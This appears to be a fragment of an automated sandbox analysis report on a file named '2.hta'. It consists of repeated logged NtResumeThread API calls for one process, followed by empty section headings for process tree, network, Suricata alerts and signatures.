NtResumeThread Aug. 20, 2024, 5:44 p.m.	thread_handle: 0x0000000000000150 suspend_count: 2 process_identifier: 2836	1	0	0
NtResumeThread Aug. 20, 2024, 5:44 p.m.	thread_handle: 0x0000000000000150 suspend_count: 2 process_identifier: 2836	1	0	0
NtResumeThread Aug. 20, 2024, 5:44 p.m.	thread_handle: 0x0000000000000150 suspend_count: 2 process_identifier: 2836	1	0	0
NtResumeThread Aug. 20, 2024, 5:44 p.m.	thread_handle: 0x0000000000000150 suspend_count: 2 process_identifier: 2836	1	0	0
NtResumeThread Aug. 20, 2024, 5:44 p.m.	thread_handle: 0x0000000000000150 suspend_count: 2 process_identifier: 2836	1	0	0
NtResumeThread Aug. 20, 2024, 5:44 p.m.	thread_handle: 0x0000000000000150 suspend_count: 2 process_identifier: 2836	1	0	0
NtResumeThread Aug. 20, 2024, 5:44 p.m.	thread_handle: 0x0000000000000150 suspend_count: 2 process_identifier: 2836	1	0	0
NtResumeThread Aug. 20, 2024, 5:44 p.m.	thread_handle: 0x0000000000000150 suspend_count: 2 process_identifier: 2836	1	0	0
NtResumeThread Aug. 20, 2024, 5:44 p.m.	thread_handle: 0x0000000000000150 suspend_count: 2 process_identifier: 2836	1	0	0
NtResumeThread Aug. 20, 2024, 5:44 p.m.	thread_handle: 0x0000000000000150 suspend_count: 2 process_identifier: 2836	1	0	0
NtResumeThread Aug. 20, 2024, 5:44 p.m.	thread_handle: 0x0000000000000150 suspend_count: 2 process_identifier: 2836	1	0	0
NtResumeThread Aug. 20, 2024, 5:44 p.m.	thread_handle: 0x0000000000000150 suspend_count: 2 process_identifier: 2836	1	0	0
NtResumeThread Aug. 20, 2024, 5:44 p.m.	thread_handle: 0x0000000000000150 suspend_count: 2 process_identifier: 2836	1	0	0
NtResumeThread Aug. 20, 2024, 5:44 p.m.	thread_handle: 0x0000000000000150 suspend_count: 2 process_identifier: 2836	1	0	0
NtResumeThread Aug. 20, 2024, 5:44 p.m.	thread_handle: 0x0000000000000150 suspend_count: 2 process_identifier: 2836	1	0	0
NtResumeThread Aug. 20, 2024, 5:44 p.m.	thread_handle: 0x0000000000000150 suspend_count: 2 process_identifier: 2836	1	0	0
NtResumeThread Aug. 20, 2024, 5:44 p.m.	thread_handle: 0x0000000000000150 suspend_count: 2 process_identifier: 2836	1	0	0

2.hta

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All